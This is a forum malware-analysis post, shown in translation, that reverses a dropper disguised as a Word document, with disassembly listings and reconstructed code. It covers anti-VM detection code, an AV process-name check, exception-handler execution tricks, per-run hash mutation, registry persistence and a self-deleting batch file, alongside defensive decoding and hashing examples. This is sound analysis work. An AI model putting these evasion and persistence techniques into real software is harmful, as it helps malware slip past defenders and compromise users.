A little trick hidden in exception handling
This post was last edited by zxcfvasd on 2013-11-18 09:23.
Sample information:
Author: h_one
Packer: none
Affected platform: Windows
Summary:
The sample wears the Word icon and poses as a .doc, but it is an .exe. When the user double-clicks it, the process walks the running-process list looking for avp.exe, 360tray.exe, KsfafSvc.exe and RsTray.exe.
a. If one of these AV processes is running, it only creates the file '请你按照表格填写资料.doc' (roughly "please fill in your details according to the form.doc").
b. If no AV is running, the real behaviour appears: it still creates '请你按照表格填写资料.doc', but it also creates alg.exe and finally a batch file, hostfix.bat, that deletes the dropper itself.
All of these files are written to the temp directory c:\DOCUME~1\AYL\LOCALS~1\Temp\xxxxxx
PS: what attracted me to this sample is that every critical action is carried out inside exception-handler code. That hides the logic from a casual trace and makes reversing harder.
Detailed analysis:
Entering main, you can see the dropper registers an SEH frame of its own; set a breakpoint there and follow it (this is the 'cute' part of the sample).
The first call in the screenshot: CreateFileW on the running module (the dropper itself), ReadFile of 0x1000 bytes, and a value computed from those bytes that is used to check whether the dropper has been modified.
call 0040189c: obtains the address of CreateProcessW.
Next, step into call 401F59:
00401F64|.E8 17100000 call sample(?00402F80 ; ZwQuerySystemInformation(SystemProcessInformation = 5): enumerate processes
00401F69|.8945 FC mov ,eax
00401F6C|.68 18C34000 push sample(?0040C318 ;ASCII "avp.exe"
00401F71|.8B45 FC mov eax,
00401F74|.50 push eax ;ProcessInfo_buf
00401F75|.E8 61110000 call sample(?004030DB ; walk the process names looking for avp.exe
00401F7A|.83C4 08 add esp,0x8
00401F7D|.85C0 test eax,eax
00401F7F|.74 11 je Xsample(?00401F92 ; not taken if the AV process was found
00401F81|.8B0D 60D84000 mov ecx,dword ptr ds:
00401F87|.890D 60D84000 mov dword ptr ds:,ecx
00401F8D|.E9 A4000000 jmp sample(?00402036
00401F92|>6A 1F push 0x1F
00401F94|.E8 D8140000 call sample(?00403471
00401F99|.83C4 04 add esp,0x4
00401F9C|.50 push eax
00401F9D|.8B55 FC mov edx,
00401FA0|.52 push edx
00401FA1|.E8 35110000 call sample(?004030DB ;360tray.exe
Step into call 00402f80.
Note the argument to call 403471 in the screenshot: 403471 is the string-decryption routine, and the index passed in selects the string. Here:
index 4 decrypts to NtQuerySystemInformation
index 1 decrypts to ntdll
Tracing further gives the index table:
0x24 ------------ ShellExecuteW
0x22 ------------ Shell32.dll
0x18 ------------ VirtualAlloc
0x2 ------------- Kernel32.dll
0x5 ------------- GetVolumeInformation
0x6 ------------- GetAdaptersInfo
0x3 ------------- Iphlpapi.dll
0x1 ------------- ntdll.dll
0x9 ------------- NtCreateKey
0xA ------------- NtClose
0x8 ------------- NtOpenKey
LoadLibrary and GetProcAddress then turn the decrypted names into a function address. Every later API call is resolved the same way, and once the address is in hand call 4033E0 re-encrypts the function and DLL names, so the plaintext strings exist in memory only briefly and never appear in the import table.
Then:
00403000|> /BA 01000000 /mov edx,0x1
00403005|. |85D2 |test edx,edx
00403007|. |74 5A |je Xsample(?00403063
00403009|. |8D45 FC |lea eax,
0040300C|. |50 |push eax
0040300D|. |8B4D F0 |mov ecx,
00403010|. |51 |push ecx
00403011|. |8B55 F8 |mov edx,
00403014|. |52 |push edx
00403015|. |6A 05 |push 0x5 ; SystemProcessInformation: enumerate processes
00403017|. |FF15 C4D84000 |call dword ptr ds: ;ntdll.ZwQuerySystemInformation
ZwQuerySystemInformation() returns the list of running processes.
The list is walked to see whether an AV is present; if none is found, execution reaches the call shown in the screenshot, otherwise that call is skipped.
Stepping into that call
yields the string rasdial /disconnect:
00401E02 .8965 E8 mov dword ptr ss:,esp
00401E05 .6A 15 push 0x15
00401E07 .E8 65160000 call sample(?00403471 ;/disconnect
00401E0C .83C4 04 add esp,0x4
00401E0F .50 push eax
00401E10 .6A 14 push 0x14
00401E12 .E8 5A160000 call sample(?00403471 ;rasdial
00401E17 .83C4 04 add esp,0x4
00401E1A .50 push eax
00401E1B .68 10C34000 push sample(?0040C310 ;ASCII "%s %s"
00401E20 .68 04010000 push 0x104
00401E25 .8D85 E4FEFFFF lea eax,dword ptr ss:
00401E2B .50 push eax
00401E2C .E8 0F300000 call sample(?00404E40 ; builds "rasdial /disconnect" (snprintf-style: buf, 0x104, "%s %s", "rasdial", "/disconnect")
Next comes the spot where the exception is deliberately triggered; the sample's key behaviour then runs inside the exception-handling path. The method: seed with time(), then ecx = rand() and a byte store through ecx. MSVC's rand() returns 0..0x7FFF, so the target is always inside the first 32 KB of the address space, which Windows never maps in a user-mode process: the "random" write is a guaranteed access violation, not a probabilistic one.
(This is the sample's highlight.)
00401E55 .E8 A3270000 call sample(?004045FD ;_time
00401E5A .83C4 04 add esp,0x4
00401E5D .50 push eax
00401E5E .E8 72270000 call sample(?004045D5 ; srand(time)
00401E63 .83C4 04 add esp,0x4
00401E66 .C745 FC 00000>mov dword ptr ss:,0x0
00401E6D >B8 01000000 mov eax,0x1
00401E72 .85C0 test eax,eax
00401E74 .74 1A je Xsample(?00401E90
00401E76 .E8 64270000 call sample(?004045DF ;_rand
00401E7B .8985 D8FCFFFF mov dword ptr ss:,eax
00401E81 .E8 59270000 call sample(?004045DF ;_rand
00401E86 .8B8D D8FCFFFF mov ecx,dword ptr ss:
00401E8C .8801 mov byte ptr ds:,al ; write through ecx = rand(): faults, control passes to the exception handler
00401E8E .^ EB DD jmp Xsample(?00401E6D
00401E90 >C745 FC FFFFF>mov dword ptr ss:,-0x1
00401E97 .EB 1A jmp Xsample(?00401EB3
00401E99 .8D95 DCFCFFFF lea edx,dword ptr ss:
00401E9F .52 push edx
00401EA0 .E8 D4FEFFFF call sample(?00401D79
00401EA5 .83C4 04 add esp,0x4
00401EA8 .C3 retn
Handler:
00404D68/$55 push ebp ; structured exception handler (MSVC __try/__except support routine)
00404D69|.8BEC mov ebp,esp
00404D6B|.83EC 08 sub esp,0x8
00404D6E|.53 push ebx
00404D6F|.56 push esi
00404D70|.57 push edi
00404D71|.55 push ebp
00404D72|.FC cld
00404D73|.8B5D 0C mov ebx, ; EXCEPTION_REGISTRATION
00404D76|.8B45 08 mov eax, ; EXCEPTION_RECORD
00404D79|.F740 04 06000>test dword ptr ds:,0x6 ; ExceptionFlags: is this an unwind?
00404D80|.0F85 82000000 jnz sample(?00404E08
00404D86|.8945 F8 mov ,eax ; = Exception_Record
00404D89|.8B45 10 mov eax, ;Context
00404D8C|.8945 FC mov ,eax ; = Context
00404D8F|.8D45 F8 lea eax,
00404D92|.8943 FC mov dword ptr ds:,eax
00404D95|.8B73 0C mov esi,dword ptr ds:
00404D98|.8B7B 08 mov edi,dword ptr ds:
00404D9B|>83FE FF /cmp esi,-0x1
00404D9E|.74 61 |je Xsample(?00404E01
00404DA0|.8D0C76 |lea ecx,dword ptr ds:
00404DA3|.837C8F 04 00|cmp dword ptr ds:,0x0
00404DA8|.74 45 |je Xsample(?00404DEF
00404DAA|.56 |push esi
00404DAB|.55 |push ebp
00404DAC|.8D6B 10 |lea ebp,dword ptr ds:
00404DAF|.FF548F 04 |call dword ptr ds: ; scope-table entry +4: the filter expression
Inside the handler it is obvious the author used __try/__except: this is MSVC's frame handler (the _except_handler3 pattern, walking scope-table entries of {previous try level, filter, handler}). The call at 00404DAF (opcode FF548F 04, scope-table entry +4) runs the filter expression; the call through entry +8 (seen later at 00404DEB) runs the __except body.
The filter call at 00404DAF is the key one here, so let's step into it and see what it does:
00401E99 .8D95 DCFCFFFF lea edx,dword ptr ss:
00401E9F .52 push edx
00401EA0 .E8 D4FEFFFF call sample(?00401D79
00401EA5 .83C4 04 add esp,0x4
00401EA8 .C3 retn
Stepping into that call:
CreateProcessW is invoked from inside the exception-handling path to run rasdial /disconnect, dropping the host's dial-up connection.
00401DB5|.51 push ecx
00401DB6|.8D55 AC lea edx,
00401DB9|.52 push edx
00401DBA|.6A 00 push 0x0
00401DBC|.6A 00 push 0x0
00401DBE|.6A 00 push 0x0
00401DC0|.6A 01 push 0x1
00401DC2|.6A 00 push 0x0
00401DC4|.6A 00 push 0x0
00401DC6|.8B45 08 mov eax,
00401DC9|.50 push eax ;rasdial /disconnect
00401DCA|.6A 00 push 0x0
00401DCC|.FF15 C0234100 call dword ptr ds: ;kernel32.CreateProcessW
004028E6 .E8 11F1FFFF call sample(?004019FC
This call creates the temp file C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\请您按照表格填写资料.doc, copies 0x6600 bytes from offset 0x20000 of the dropper, decrypts them, writes them into the .doc with WriteFile (the decoy for the user), and finally opens the .doc with ShellExecuteW.
00401A9F|.E8 C7F5FFFF call sample(?0040106B
00401AA4|.83C4 0C add esp,0xC
00401AA7|.68 14254100 push sample(?00412514
00401AAC|.8D8D F8FDFFFF lea ecx,
00401AB2|.51 push ecx
00401AB3|.68 04254100 push sample(?00412504
00401AB8|.8B15 50D84000 mov edx,dword ptr ds:
00401ABE|.52 push edx
00401ABF|.E8 1FFAFFFF call sample(?004014E3 ; copy 0x6600 bytes at dropper offset 0x20000, decrypt, then
00401AC4|.83C4 10 add esp,0x10 ; write the decrypted data into the .doc with WriteFile
00401AC7|.85C0 test eax,eax
00401AC9|.75 07 jnz Xsample(?00401AD2
00401ACB|.6A 00 push 0x0
00401ACD|.E8 4F2F0000 call sample(?00404A21
00401AD2|>8D85 F8FDFFFF lea eax,
00401AD8|.50 push eax
00401AD9|.68 C0C24000 push sample(?0040C2C0 ;UNICODE ""%s""
00401ADE|.8D8D F0FBFFFF lea ecx,
00401AE4|.51 push ecx
00401AE5|.E8 0C300000 call sample(?00404AF6 ;_swprintf
00401AEA|.83C4 0C add esp,0xC
00401AED|.6A 05 push 0x5
00401AEF|.6A 00 push 0x0
00401AF1|.6A 00 push 0x0
00401AF3|.8D95 F8FDFFFF lea edx,
00401AF9|.52 push edx
00401AFA|.68 CCC24000 push sample(?0040C2CC ;UNICODE "edit"
00401AFF|.6A 00 push 0x0
00401B01|.FF15 58D84000 call dword ptr ds: ;Shell32.ShellExecuteW
00401B07|.83C4 18 add esp,0x18
00401B0A|.8BE5 mov esp,ebp
00401B0C|.5D pop ebp
With no AV present and the decoy .doc open, the sample now shows its real face.
The exception is built the same way as before:
00402907 .E8 F11C0000 call sample(?004045FD ;_time
0040290C .83C4 04 add esp,0x4
0040290F .50 push eax
00402910 .E8 C01C0000 call sample(?004045D5
00402915 .83C4 04 add esp,0x4
00402918 .C745 FC 00000>mov dword ptr ss:,0x0
0040291F >B8 01000000 mov eax,0x1
00402924 .85C0 test eax,eax
00402926 .74 14 je Xsample(?0040293C
00402928 .E8 B21C0000 call sample(?004045DF ;_rand
0040292D .8945 C8 mov dword ptr ss:,eax
00402930 .E8 AA1C0000 call sample(?004045DF ;_rand
00402935 .8B4D C8 mov ecx,dword ptr ss: ; ecx = the previous rand() value
00402938 .8801 mov byte ptr ds:,al ; trigger the exception
The exception fires and we enter this call.
Stepping in, the sample first runs a VM check using a privileged instruction: eax = 'VMXh', ecx = 0xA, edx = 0x5658, then in eax,dx. Under VMware the backdoor port answers and ebx comes back as 'VMXh'; on real hardware in is privileged in ring 3 and raises an exception, which the inner __try catches. (The author's aside: a clever sample. It knows today's AV is strong, so it doesn't fight it head-on; by bailing out under a VM it stays out of the AV's emulation engine, which makes it hard to catch.)
004025B8 .C745 E4 01000>mov dword ptr ss:,0x1
004025BF .C745 FC 00000>mov dword ptr ss:,0x0
004025C6 .52 push edx
004025C7 .51 push ecx
004025C8 .53 push ebx
004025C9 .B8 68584D56 mov eax,0x564D5868
004025CE .BB 00000000 mov ebx,0x0
004025D3 .B9 0A000000 mov ecx,0xA
004025D8 .BA 58560000 mov edx,0x5658
004025DD .ED in eax,dx
004025DE .81FB 68584D56 cmp ebx,0x564D5868
004025E4 .0F9445 E4 sete byte ptr ss:
004025E8 .5B pop ebx
004025E9 .59 pop ecx
004025EA .5A pop edx
004025EB .C745 FC FFFFF>mov dword ptr ss:,-0x1
004025F2 .EB 17 jmp Xsample(?0040260B
004025F4 .B8 01000000 mov eax,0x1
Next, the second key call in the handler: the __except body (scope-table entry +8, opcode FF548F 08):
00404DEB |.FF548F 08 |call dword ptr ds:
00402955 .8B65 E8 mov esp,dword ptr ss:
00402958 .C745 FC FFFFF>mov dword ptr ss:,-0x1
0040295F >33C0 xor eax,eax
00402961 .85C0 test eax,eax
00402963 .^ 75 A0 jnz Xsample(?00402905
00402965 .E8 A4F1FFFF call sample(?00401B0E
Then alg.exe is created in the temp directory: data copied out of the dropper is decrypted into the alg.exe image and written to the file.
004016C0 |.0395 BCFDFFFF ||add edx,
004016C6 |.33C0 ||xor eax,eax
004016C8 |.8A02 ||mov al,byte ptr ds:
004016CA |.8B4D 0C ||mov ecx,
004016CD |.038D C8FDFFFF ||add ecx,
004016D3 |.33D2 ||xor edx,edx
004016D5 |.8A51 10 ||mov dl,byte ptr ds:
004016D8 |.33C2 ||xor eax,edx
004016DA |.8885 C4FDFFFF ||mov byte ptr ss:,al
004016E0 |.8B45 0C ||mov eax,
004016E3 |.0385 C8FDFFFF ||add eax,
004016E9 |.8B8D D0FDFFFF ||mov ecx,
004016EF |.038D BCFDFFFF ||add ecx,
004016F5 |.8A50 10 ||mov dl,byte ptr ds:
004016F8 |.2A11 ||sub dl,byte ptr ds:
004016FA |.8B45 0C ||mov eax,
004016FD |.0385 C8FDFFFF ||add eax,
00401703 |.8850 10 ||mov byte ptr ds:,dl
00401706 |.8B8D D0FDFFFF ||mov ecx,
0040170C |.038D BCFDFFFF ||add ecx,
00401712 |.8A95 C4FDFFFF ||mov dl,byte ptr ss:
00401718 |.8811 ||mov byte ptr ds:,dl
0040171A |.^ E9 68FFFFFF |\jmp sample(?00401687 ; decrypt the data copied out of the dropper
The decrypted alg.exe is 0x11000 bytes; it can be dumped from memory here with LordPE (the author's guess: a trojan, to be enjoyed later).
Next, this call:
00401771 |.50 push eax ; alg.exe data
00401772 |.8B8D CCFDFFFF mov ecx,
00401778 |.51 push ecx ;size
00401779 |.E8 47FBFFFF call sample(?004012C5 ; seeds rand() with the time and overwrites 0xA bytes at offset 0xF040 of the child binary
004012DB |.E8 1D330000 call sample(?004045FD ;_time
004012E0 |.83C4 04 add esp,0x4
004012E3 |.50 push eax
004012E4 |.E8 EC320000 call sample(?004045D5 ; srand(time)
004012E9 |.83C4 04 add esp,0x4
004012EC |.C745 FC 00000>mov ,0x0
004012F3 |.EB 09 jmp Xsample(?004012FE
004012F5 |>8B45 FC /mov eax,
004012F8 |.83C0 01 |add eax,0x1
004012FB |.8945 FC |mov ,eax
004012FE |>8B4D FC mov ecx,
00401301 |.3B4D 0C |cmp ecx, ;size
00401304 |.73 60 |jnb Xsample(?00401366
00401306 |.6A 0A |push 0xA
00401308 |.8B55 08 |mov edx, ; addr
0040130B |.0355 FC |add edx,
0040130E |.52 |push edx
0040130F |.68 80C04000 |push sample(?0040C080
00401314 |.E8 472F0000 |call sample(?00404260 ; strncmp: search the child's data for the "F1" marker string
00401319 |.83C4 0C |add esp,0xC
0040131C |.85C0 |test eax,eax
0040131E |.75 44 |jnz Xsample(?00401364 ; marker found at offset 0xF040
00401320 |.C745 F8 00000>|mov ,0x0
00401327 |.EB 09 |jmp Xsample(?00401332
00401329 |>8B45 F8 |/mov eax,
0040132C |.83C0 02 ||add eax,0x2
0040132F |.8945 F8 ||mov ,eax
00401332 |>837D F8 0A | cmp ,0xA
00401336 |.7D 24 ||jge Xsample(?0040135C
00401338 |.E8 A2320000 ||call sample(?004045DF ;_rand
0040133D |.8945 F4 ||mov ,eax ; rand() seeded from the time, to be written into the child
00401340 |.6A 02 ||push 0x2
00401342 |.8D4D F4 ||lea ecx,
00401345 |.51 ||push ecx ;Src
00401346 |.8B55 FC ||mov edx,
00401349 |.0355 F8 ||add edx,
0040134C |.8B45 08 ||mov eax,
0040134F |.03C2 ||add eax,edx
00401351 |.50 ||push eax ; destination: the marker at 0xF040
00401352 |.E8 492F0000 ||call sample(?004042A0 ;memcpy
00401357 |.83C4 0C ||add esp,0xC
0040135A |.^ EB CD |\jmp Xsample(?00401329 ; writes 0xA bytes in total, so each run of the dropper yields a different alg.exe (a different file hash every time, which is what makes it "more survivable")
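The marker-patching step above, and the analyst-side answer to it, as an added example (not code from the post or from the sample). The dropper scans the decrypted alg.exe for a 10-byte marker with strncmp(…, 0xA), seeds rand() with time() and memcpy()s five 2-byte rand() results over it, so every dropped copy hashes differently; the defender's fix is to hash with that window masked. MARKER, SAMPLE_IMAGE and the PRNG are constructed stand-ins: the post does not reproduce the marker string at 0040C080, and Python's random.Random is not the MSVC CRT rand().

```python
"""Added example: per-run marker patching as the dropper does it, and a
masked hash that collapses all such copies back to one identifier.
Everything below is constructed; it is not the sample's data or code."""
import hashlib
import random

MARKER = b"F1MARKER00"   # constructed; stands in for the 10-byte string at 0040C080
MARKER_LEN = 0xA         # strncmp length used by the sample
WORDS = 5                # five 2-byte rand() values = 0xA bytes

# Constructed fake payload: a header, padding, the marker at offset 0x42, padding.
SAMPLE_IMAGE = b"MZ" + b"\x90" * 0x40 + MARKER + b"\xcc" * 0x40


def find_marker(image: bytes, marker: bytes = MARKER) -> int:
    """Linear scan with a fixed-length compare, as the sample's offset
    loop plus strncmp(..., 0xA) does. Returns -1 if the marker is absent."""
    n = len(marker)
    for off in range(len(image) - n + 1):
        if image[off:off + n] == marker:
            return off
    return -1


def patch_marker(image: bytes, seed: int, marker: bytes = MARKER) -> bytes:
    """Dropper side: overwrite the marker with WORDS little-endian 16-bit
    values from a PRNG seeded like srand(time()). Returns a new image;
    the input comes back unchanged if the marker is missing."""
    off = find_marker(image, marker)
    if off < 0:
        return image
    rng = random.Random(seed)                  # stand-in for srand()/rand()
    out = bytearray(image)
    for i in range(WORDS):
        word = rng.randrange(0, 0x8000)        # MSVC rand() range is 0..0x7FFF
        out[off + 2 * i:off + 2 * i + 2] = word.to_bytes(2, "little")
    return bytes(out)


def masked_sha256(image: bytes, off: int, length: int = MARKER_LEN) -> str:
    """Analyst side: SHA-256 with the mutable window zeroed, so every copy
    the dropper produces hashes to the same value. length=0 gives the
    plain SHA-256 of the whole image."""
    masked = image[:off] + b"\x00" * length + image[off + length:]
    return hashlib.sha256(masked).hexdigest()


if __name__ == "__main__":
    off = find_marker(SAMPLE_IMAGE)
    for seed in (1, 2):
        dropped = patch_marker(SAMPLE_IMAGE, seed)
        print(f"seed={seed} full={masked_sha256(dropped, off, 0)[:16]} "
              f"masked={masked_sha256(dropped, off)[:16]}")
```

Two drops with different seeds differ in the 10 marker bytes only, so their full hashes differ while the masked hashes agree; a rule that masks the region at 0xF040 before hashing would match every alg.exe this dropper produces.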
Stepping into the last call in the screenshot gives the routine below (IDA output, tidied so it compiles). It takes a 4-byte input and a 6-byte input, XORs each with part of a 10-byte key (a4), interleaves them into a 16-byte output (a3) and runs two rolling-XOR passes over it. The 4+6 byte sizes match a volume serial number and a MAC address, both of which the sample resolves (GetVolumeInformation, GetAdaptersInfo), so this looks like a host-ID generator; the post itself does not say.
#include <string.h>
#ifndef _MSC_VER
#define __cdecl
#endif
typedef unsigned char _BYTE;

/* sub_403260 as decompiled, with the locals declared. a4 is a 10-byte key:
   key[0..3] masks the 4-byte Src, key[4..9] masks the 6-byte a2; a3 receives 16 bytes. */
char __cdecl sub_403260(void *Src, const void *a2, int a3, int a4)
{
  int i, j, k, l;
  _BYTE v6, v4, v7;
  int result;

  for ( i = 0; i < 4; ++i )
    *((_BYTE *)Src + i) ^= *(_BYTE *)(i + a4);
  for ( j = 0; j < 6; ++j )
    *((_BYTE *)a2 + j) ^= *(_BYTE *)(j + a4 + 4);      /* a2 is written despite the const */
  memcpy((void *)a3, Src, 2u);                          /* layout: S0 S1 | a2[0..5] | S2 S3 | a2[0..5] */
  memcpy((void *)(a3 + 2), a2, 6u);
  memcpy((void *)(a3 + 8), (char *)Src + 2, 2u);
  memcpy((void *)(a3 + 10), a2, 6u);
  v6 = *(_BYTE *)(a3 + 1) ^ *(_BYTE *)a3;               /* rolling XOR over bytes 2..7 */
  for ( k = 2; k < 8; ++k )
  {
    *(_BYTE *)(k + a3) ^= v6;
    v6 += *(_BYTE *)(k + a3);
  }
  v4 = *(_BYTE *)(a3 + 9) ^ *(_BYTE *)(a3 + 8);
  result = v4 + v6;
  v7 = v4 + v6;
  for ( l = 10; l < 16; ++l )                           /* same pass over bytes 10..15 */
  {
    result = l + a3;
    *(_BYTE *)(l + a3) ^= v7;
    v7 += *(_BYTE *)(l + a3);
  }
  return result;
}
At this point we are back at
00404DAF |.FF548F 04 |call dword ptr ds: ; filter expression: the VM check
and the exception-handling trick is used once more to carry out the key behaviour:
00401D3B .8D95 D0FAFFFF lea edx,dword ptr ss:
00401D41 .52 push edx //alg.exe
00401D42 .E8 32000000 call sample(?00401D79
00401D47 .83C4 04 add esp,0x4
00401D4A .C3 retn
call 00401D79
00401DAC |.66:C745 DC 00>mov word ptr ss:,0x0
00401DB2 |.8D4D F0 lea ecx,
00401DB5 |.51 push ecx ; /pProcessInfo
00401DB6 |.8D55 AC lea edx, ; |
00401DB9 |.52 push edx ; |pStartupInfo
00401DBA |.6A 00 push 0x0 ; |CurrentDir = NULL
00401DBC |.6A 00 push 0x0 ; |pEnvironment = NULL
00401DBE |.6A 00 push 0x0 ; |CreationFlags = 0
00401DC0 |.6A 01 push 0x1 ; |InheritHandles = TRUE
00401DC2 |.6A 00 push 0x0 ; |pThreadSecurity = NULL
00401DC4 |.6A 00 push 0x0 ; |pProcessSecurity = NULL
00401DC6 |.8B45 08 mov eax, ; |
00401DC9 |.50 push eax ;
00401DCA |.6A 00 push 0x0 ; |ModuleFileName = NULL
00401DCC |.FF15 C0234100 call dword ptr ds: ; \CreateProcessW
00401DD2 |.B8 01000000 mov eax,0x1
The alg.exe process is created (this should be the sample's real payload).
Afterwards it calls NtCreateKey to create a key, then ZwOpenKey and ZwSetValueKey to set the registry value: name StubPath, data "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\alg.exe". StubPath is the value name used by Active Setup's Installed Components entries, which run the command at the next user logon, so this is the persistence step (the post does not show the full key path).
The last call creates the batch file hostfix.bat in the temp directory;
its purpose is to delete the dropper itself.
0040268D > \8B4D 08 mov ecx,dword ptr ss:
00402690 .51 push ecx ; /StringToAdd
00402691 .8D95 C8FCFFFF lea edx,dword ptr ss: ; |
00402697 .52 push edx ; |ConcatString
00402698 .FF15 04B04000 call dword ptr ds:[<&KERNEL32.lstrc>; \lstrcatW
0040269E .6A 00 push 0x0 ; /hTemplateFile = NULL
004026A0 .6A 00 push 0x0 ; |Attributes = 0
004026A2 .6A 02 push 0x2 ; |Mode = CREATE_ALWAYS
004026A4 .6A 00 push 0x0 ; |pSecurity = NULL
004026A6 .6A 03 push 0x3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
004026A8 .68 00000040 push 0x40000000 ; |Access = GENERIC_WRITE
004026AD .8D85 C8FCFFFF lea eax,dword ptr ss: ; |
004026B3 .50 push eax ; |FileName
004026B4 .FF15 20B04000 call dword ptr ds:[<&KERNEL32.Creat>; \CreateFileW
004026BA .8985 C4FCFFFF mov dword ptr ss:,eax ; handle of the newly created .bat file
004026C0 .83BD C4FCFFFF>cmp dword ptr ss:,-0x1
004026C7 .75 07 jnz Xsample(?004026D0
004026C9 .33C0 xor eax,eax
004026CB .E9 93010000 jmp sample(?00402863
004026D0 >C785 D4FEFFFF>mov dword ptr ss:,0x0
004026DA .EB 0F jmp Xsample(?004026EB
004026DC >8B8D D4FEFFFF mov ecx,dword ptr ss:
004026E2 .83C1 01 add ecx,0x1
004026E5 .898D D4FEFFFF mov dword ptr ss:,ecx
004026EB >83BD D4FEFFFF>cmp dword ptr ss:,0x4B
004026F2 .73 46 jnb Xsample(?0040273A
004026F4 .8B95 D4FEFFFF mov edx,dword ptr ss:
004026FA .33C0 xor eax,eax
004026FC .8A82 34C04000 mov al,byte ptr ds:
00402702 .8985 DCFEFFFF mov dword ptr ss:,eax
00402708 .8B8D D4FEFFFF mov ecx,dword ptr ss:
0040270E .8A91 34C04000 mov dl,byte ptr ds:
00402714 .3215 30C04000 xor dl,byte ptr ds:
0040271A .8B85 D4FEFFFF mov eax,dword ptr ss:
00402720 .8890 34C04000 mov byte ptr ds:,dl
00402726 .8A0D 30C04000 mov cl,byte ptr ds:
0040272C .028D DCFEFFFF add cl,byte ptr ss:
00402732 .880D 30C04000 mov byte ptr ds:,cl
00402738 .^ EB A2 jmp Xsample(?004026DC
0040273A >68 04010000 push 0x104
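The byte loop at 004026D0-00402738, as an added example (not code from the post or the sample), reconstructed from the opcode bytes in the listing: 8A82 34C04000 (mov al,[edx+40C034]: fetch the ciphertext byte), 8985 DCFEFFFF (save it at [ebp-124]), 3215 30C04000 (xor dl,[40C030]: XOR with the key byte), 8890 34C04000 (write it back in place), 028D DCFEFFFF (add cl,[ebp-124]: key += saved ciphertext byte), 880D 30C04000 (store the new key), repeated for 0x4B bytes (cmp [ebp-12C],0x4B). The key at 0040C030 is one byte that advances on each ciphertext byte, so the blob at 0040C034, presumably the hostfix.bat body written out next, can be recovered by trying all 256 keys and keeping the printable result. The post does not reproduce the bytes at 0040C030/0040C034, so SAMPLE_KEY, SAMPLE_PT (a generic self-delete .bat) and SAMPLE_CT below are constructed.

```python
"""Added example: the rolling-XOR decoder used on the hostfix.bat blob,
its inverse (for building test vectors) and a single-byte key brute force.
The algorithm is read off the opcode bytes in the listing; the data is
constructed, not the sample's."""
BLOB_LEN = 0x4B  # loop bound in the sample (cmp [ebp-12C],0x4B)


def decode_rolling_xor(ct: bytes, key: int) -> bytes:
    """Decoder exactly as the sample runs it; `key` is the byte at 0040C030."""
    out = bytearray()
    k = key & 0xFF
    for c in ct:
        out.append(c ^ k)       # xor dl,[40C030]; mov [eax+40C034],dl
        k = (k + c) & 0xFF      # add cl,[ebp-124]; mov [40C030],cl
    return bytes(out)


def encode_rolling_xor(pt: bytes, key: int) -> bytes:
    """Inverse of decode_rolling_xor. The key advances on the ciphertext
    byte, so compute c first and then update the key with it."""
    out = bytearray()
    k = key & 0xFF
    for p in pt:
        c = p ^ k
        out.append(c)
        k = (k + c) & 0xFF
    return bytes(out)


def printable(data: bytes) -> bool:
    """True if data looks like a text file, which a .bat must be."""
    return all(32 <= b < 127 or b in (9, 10, 13) for b in data)


def brute_force_key(ct: bytes) -> list:
    """Candidate key bytes whose decode is printable text. A wrong key
    desynchronises from the first byte onward, so for a blob of this
    size false positives are rare."""
    return [k for k in range(256) if printable(decode_rolling_xor(ct, k))]


# Constructed test vector: a generic self-deleting batch file, not the sample's real blob.
SAMPLE_KEY = 0x5A
SAMPLE_PT = (b":a\r\n"
             b"del \"%1\"\r\n"
             b"if exist \"%1\" goto a\r\n"
             b"del %0\r\n")
SAMPLE_CT = encode_rolling_xor(SAMPLE_PT, SAMPLE_KEY)

if __name__ == "__main__":
    for k in brute_force_key(SAMPLE_CT):
        print(f"key 0x{k:02x}:", decode_rolling_xor(SAMPLE_CT, k))
```

Two practical notes: the routine decrypts in place and consumes the key at 0040C030, so running it a second time in the debugger yields garbage; dump the 0x4B bytes at 0040C034 before the loop (ciphertext) or after it (plaintext), and if only the ciphertext is available, brute_force_key recovers the byte the sample kept at 0040C030.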
Finally, the same self-induced exception is used once more, and hostfix.bat is run from the exception-handling code to delete the dropper.
That completes the dropper's behaviour.
To sum up why the AV ignores this sample at first:
1. Dangerous and important APIs are referenced by an index; the index decrypts to the API name, and the address is obtained with LoadLibrary and GetProcAddress, so nothing suspicious appears in the import table.
2. ZwQuerySystemInformation lists the running processes; if an AV is present the sample does not fight it and only drops the .doc.
3. AV engines run samples in a VM; this sample does a VM check inside the exception-handling path and exits if it detects one.
4. With no VM and no AV, it extracts the alg.exe data from the dropper, decrypts it, then triggers an exception and launches alg.exe from the handler.
VM-check code (C reconstruction of the routine at 004025B8; 32-bit MSVC, since it relies on __asm and __try):
#include <windows.h>
#include <tchar.h>

BOOL IsbVm()
{
    BOOL bRet = TRUE;
    __try
    {
        __asm
        {
            push edx
            push ecx
            push ebx
            mov eax, 'VMXh'          // magic 0x564D5868
            mov ebx, 0
            mov ecx, 0xA             // backdoor command: get VMware version
            mov edx, 'VX'            // backdoor I/O port 0x5658
            in eax, dx               // privileged in ring 3: faults on real hardware, answered under VMware
            cmp ebx, 'VMXh'          // VMware echoes the magic back in ebx
            setz byte ptr [bRet]     // bRet = 1 only if the backdoor answered
            pop ebx
            pop ecx
            pop edx
        }
    }
    __except (EXCEPTION_EXECUTE_HANDLER)
    {
        bRet = FALSE;                // privileged-instruction exception: not VMware
    }
    return bRet;
}

int main(int argc, char *argv[])
{
    if (IsbVm())
    {
        MessageBox(NULL, _T("Find VM"), _T("OK"), MB_OK);
    }
    else
        MessageBox(NULL, _T("Not VM"), _T("Error"), MB_OK);
    return 0;
}
Next up: analysis of the real culprit, alg.exe.
Replies:

Acrkn0W (2013-11-18 09:34): This one really is a hassle.

asd9988 (2013-11-18 10:13): Very detailed analysis; I'll keep following it.

Reply (quoting asd9988): Forgot to upload the attachment.

Reply: Thumbs up.

Reply: Way over my head, but impressive.

Reply (quoting "Next up: analysis of the real culprit, alg.exe"): Could you analyse that one too? Great write-up.

Reply: Having read the OP's post, all I can say is: very good, very powerful! The forum is better for having you here.

Reply: Really impressive, isn't it?